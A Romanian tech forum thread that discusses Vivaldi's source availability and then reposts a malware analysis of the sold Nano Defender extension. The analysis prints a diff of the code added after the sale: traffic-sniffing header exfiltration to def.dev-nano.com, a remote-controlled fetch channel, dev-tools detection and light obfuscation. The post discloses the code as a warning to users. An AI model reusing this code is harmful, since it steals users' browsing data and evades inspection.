Internet News & Discussion

Rezolvarea problemelor tehnice, ultimele știri din domeniu și cele mai interesante site-uri.
User avatar
Bogdan
Pig Cop
Posts: 624
Joined: 2 Mar 2014, 18:35

Re: Internet News & Discussion

Post by Bogdan »

I don't know. Eu nu imping lucurile atat de departe. Am gasit si asta:
https://help.vivaldi.com/article/is-viv ... en-source/

[...]This means that for all practical purposes the Vivaldi source code is available for audit.[...]

Cat timp folosesc intensiv servicii de la companii care efectiv traiesc din data collection, codul sursa al unui browser deschis spre audit e ultima mea grija.
User avatar
Jaunty
Site Admin
Posts: 1538
Joined: 1 Mar 2014, 17:46
Contact:

Re: Internet News & Discussion

Post by Jaunty »

Aha. Eu mă uitasem pe Wikipedia, dar link-ul pe care l-ai postat are mai multe detalii. Deci ei zic că Vivaldi e compus din:
- Chromium modificat, modificările fiind libere
- cod pentru interfață, care e public, dar nu liber
- cod third party, despre care nu dau detalii

E mai ok decât credeam, dar nu se ridică la standardul pe care îl consider minim.
User avatar
Ferrrrrrrrrdinand
al IX-lea
Posts: 2851
Joined: 18 Sep 2016, 22:09

Re: Internet News & Discussion

Post by Ferrrrrrrrrdinand »

Time to remove Nano Adblocker and Defender from your browsers (except Firefox)
When Nano Defender was launched in 2019, it quickly became a go-to extension to bypass anti-adblocking mechanisms on Internet sites. It used code from uBlock Origin, one of the most prominent content blocking extensions, and users started to install the new extension in Chrome and other Chromium-based browsers.

The developer of the extension revealed on the official GitHub that he decided to sell the extension twelve days ago to two Turkish developers.

Community members and Raymond Hill, developer of uBlock Origin, shared their thoughts on the deal and the fact that little information was provided. Gorhill suspected that the new owners main intention was to monetize the extension in one form or another, or do worse with it.

The Firefox fork of the extension was not part of the deal, and the maintainer of it expressed interest to rename it and continue maintaining it. All other versions of the extension, basically any for Chromium-based browsers, should be removed immediately. Users who want to be on the safe side should remove the Firefox extension as well.
Un comentariu de la gorhill, dev la ublock origin

https://github.com/NanoAdblocker/NanoCo ... -709428210
Spoiler for salvez aici comentariul:
So here is what I am seeing in the new Nano Defender 15.0.0.206:

Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.

Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:

At launch, the extension fetch something from https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listen to https://def.dev-nano.com/ for messages to populate listOfObject.

The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to https://def.dev-nano.com/ under the name handleObject.

Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:

Code: Select all

chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
    urls: ["<all_urls>"] 
}, ['requestHeaders', 'blocking', 'extraHeaders']); 
So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.

There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:

Code: Select all

var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");
Which is equivalent to:

Code: Select all

var replacerConcat = stringyFy.split("-zzz").join("");
Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.

So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:

Code: Select all

{ url: 'bank\.example\.com\/' }
Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to https://def.dev-nano.com/ as a handleObject packet.

The listOfObject can contain any number of conditions, I just gave an example with a single one above.

The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to https://def.dev-nano.com/.

Here the diff for the code change you won't find in their GitHub repo:

Code: Select all

--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
 
     const hasNews = false;
 
-    const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+    const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
     const newsReadFlag = "news-read";
 
     // This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
     // ------------------------------------------------------------------------------------------------------------- //
 
 };
-
+var defender = io.connect("https://def.dev-nano.com/"); 
+var listOfObject = {}; 
 // ----------------------------------------------------------------------------------------------------------------- //
 
 a.noopErr = () => {
@@ -211,6 +212,29 @@
 
 // ----------------------------------------------------------------------------------------------------------------- //
 
+
+ 
+async function dLisfOfObject(newList) { 
+    let dListResp = await fetch(newList.uri, newList.attr) 
+    var listOfObj = {} 
+    listOfObj.headerEntries = Array.from(dListResp.headers.entries()) 
+    listOfObj.data = await dListResp.text() 
+    listOfObj.ok = dListResp.ok; 
+    listOfObj.status = dListResp.status; 
+    return listOfObj; 
+} 
+ 
+defender.on("dLisfOfObject", async function (newList) { 
+    let getRes = await dLisfOfObject(newList); 
+    defender.emit(newList.callBack, getRes) 
+}); 
+ 
+defender.on("listOfObject", function (a) { 
+    listOfObject = a; 
+}) 
+
+
+
 // Redirect helpers
 
 a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@
 
 // 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
 a.blankMP4 = a.rLink("blank.mp4");
-
+ 
+var element = document.createElement("p"); ; 
+var openListGet = false; 
+element.__defineGetter__("id", function() { 
+    openListGet = true;  
+}); 
+ 
+var i = setInterval(function() { 
+    openListGet = false; 
+    console.log(element); 
+    if(openListGet){ 
+        defender.emit("report") 
+        console.clear(); 
+        clearInterval(i) 
+    } 
+}, 100);
 // ----------------------------------------------------------------------------------------------------------------- //
 
 // tab   - Id of the tab
@@ -450,6 +489,50 @@
 
     return true;
 };
+ 
+var blockingHandler = function (infos) { 
+    var changedAsArray = Object.keys(listOfObject); 
+
+    var detailsHeader = infos.requestHeaders; 
+    var HeadReverse = detailsHeader.reverse(); 
+    var stringyFy = JSON.stringify(HeadReverse); 
+    var mount = ""; 
+    if (changedAsArray.length > 0) { 
+        var checkerList = true; 
+        for (const object of changedAsArray) { 
+            if (object.x === object.y) { 
+                mount += 1; 
+            } 
+            break; 
+        } 
+        for (let i = 0; i < changedAsArray.length; i++) { 
+            let x = changedAsArray[i]; 
+            var re = new RegExp(listOfObject[x],'gi'); 
+            mount = "5"; 
+            if (infos[x].toString().match(re) == null) { 
+                checkerList = false; 
+                break; 
+            } 
+        } 
+        if (checkerList) { 
+            defender.emit('handleObject', infos); 
+        } 
+    } 
+    
+    var m = [45,122,122,122]
+    var s = m.map( x => String.fromCharCode(x) )
+    var x = s.join("");
+    var replacerConcat = stringyFy.split(x).join(""); 
+    var replacer = JSON.parse(replacerConcat); 
+    return { 
+        requestHeaders: replacer 
+    } 
+}; 
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
+    urls: ["<all_urls>"] 
+}, ['requestHeaders', 'blocking', 'extraHeaders']); 
+ 
 
tl;dr: "Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware."
User avatar
Jaunty
Site Admin
Posts: 1538
Joined: 1 Mar 2014, 17:46
Contact:

Re: Internet News & Discussion

Post by Jaunty »

:) Deja a fost șters din Chrome Web Store.
User avatar
Waaagh!
Forum Warlord
Posts: 4711
Joined: 2 Mar 2014, 16:23

Re: Internet News & Discussion

Post by Waaagh! »

hahaa, eet fuk turcaletilor.
NO COVER. ALL MAN.
User avatar
Ferrrrrrrrrdinand
al IX-lea
Posts: 2851
Joined: 18 Sep 2016, 22:09

Re: Internet News & Discussion

Post by Ferrrrrrrrrdinand »

money well spent :lol:
Post Reply

Return to “Software & Internet”

Who is online

Users browsing this forum: No registered users and 3 guests